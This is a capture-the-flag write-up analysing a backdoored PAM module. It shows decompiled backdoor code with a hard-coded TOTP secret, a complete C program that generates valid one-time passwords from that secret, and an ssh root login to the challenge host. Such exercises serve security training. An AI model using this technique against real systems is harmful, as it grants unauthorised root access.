Scope

The text that came as description with the CTF was the following:

I forgot to change the password on my new fancy linux server, now I’m thinking it might be compromised. I found that someone has placed this file in /usr/lib/x86_64-linux-gnu/security/, can you help me figure out what it does?

And one single binary file: pam_extrasec.so.

Walkthrough

After opening the binary in a decompiler, one function immediately catches the eye:

int64_t backdoor_bouncer(char* pass)
    char const* const enc_str = "YSLULUJRDFE7KSCHOB6PRXVFXG3E3NLG"
    int64_t shared_secret = 0
    oath_init()
    int64_t str_len
    oath_base32_decode(enc_str, 0x20, &shared_secret, &str_len)
    time_t time = time(nullptr)
    char var_19
    oath_totp_generate(shared_secret, str_len, time, 0x30, 0, 8, &var_19)
    oath_done()

This is interesting because TOTP is nice and all, but it is useless if the shared secret is known, and here the secret is hard-coded in the module as the base32-encoded string YSLULUJRDFE7KSCHOB6PRXVFXG3E3NLG. Anyone who can read the .so file can regenerate the codes.

With this information we can generate our own valid TOTPs. I did it like this:

gen_otp.c:

#include <liboath/oath.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void) {
  /* Base32 secret lifted from backdoor_bouncer() in pam_extrasec.so. */
  char const *const enc_str = "YSLULUJRDFE7KSCHOB6PRXVFXG3E3NLG";
  char *shared_secret = NULL;
  size_t str_len = 0;
  /* 8 digits plus the terminating NUL: oath_totp_generate() writes digits+1 bytes. */
  char passwd[9];

  if (oath_init() != OATH_OK) {
    fprintf(stderr, "oath_init failed\n");
    return 1;
  }
  /* oath_base32_decode() allocates the output buffer with malloc(). */
  if (oath_base32_decode(enc_str, 0x20, &shared_secret, &str_len) != OATH_OK) {
    fprintf(stderr, "base32 decode failed\n");
    return 1;
  }
  time_t t = time(NULL);
  /* Same parameters as the backdoor: 0x30 = 48-second step, start offset 0, 8 digits. */
  if (oath_totp_generate(shared_secret, str_len, t, 0x30, 0, 8, passwd) != OATH_OK) {
    fprintf(stderr, "totp generation failed\n");
    return 1;
  }
  printf("%s (valid for %ld more seconds)\n", passwd, (long)(0x30 - (t % 0x30)));

  free(shared_secret);
  oath_done();
  return 0;
}

And compiled it with gcc -o gen_otp gen_otp.c -loath. The resulting executable prints a currently valid OTP. Remember that a code is only good for its time step (0x30 in the decompiled call, i.e. 48 seconds); once that window has passed you have to generate a new one.

The pam_sm_authenticate() function shows that the login must be for the root user, so when you connect to the spawned instance with the given command, make sure to prefix the host with root@ ;)
ssh root@ctf.stair.ch -p <port>

After entering the generated OTP as the password we have a valid SSH session on the server, where a flag.txt file is waiting. Yay :)